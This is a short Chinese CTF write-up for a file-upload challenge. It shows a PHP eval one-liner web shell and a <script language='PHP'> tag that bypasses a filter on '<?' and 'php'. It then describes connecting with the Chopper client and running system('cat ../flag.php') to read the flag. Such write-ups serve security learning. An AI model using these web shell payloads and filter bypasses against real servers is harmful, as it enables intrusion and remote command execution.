访问题目网址
解题思路
-
习惯性查看源码,无收获
-
按要求上传一张Upload.png,显示上传成功,并且返回上传位置:
u/Upload.png
,可正常访问。 -
上传php一句话木马
<?php @eval($_POST['cmd']);?>
,显示上传成功,访问发现显示@eval($_POST['cmd']);?>
,测试发现过滤了<?
php
-
使用php长标签和PHP绕过过滤,重新上传。
<script language='PHP'> @eval($_POST[cmd]); </script>
-
上传成功,菜刀连接,在根目录下看到flag.php,打开即可获得flag。
不想通过菜刀连接也可以通过构造cmd=system('cat ../flag.php');
,查看源码即可获得flag。
================================================================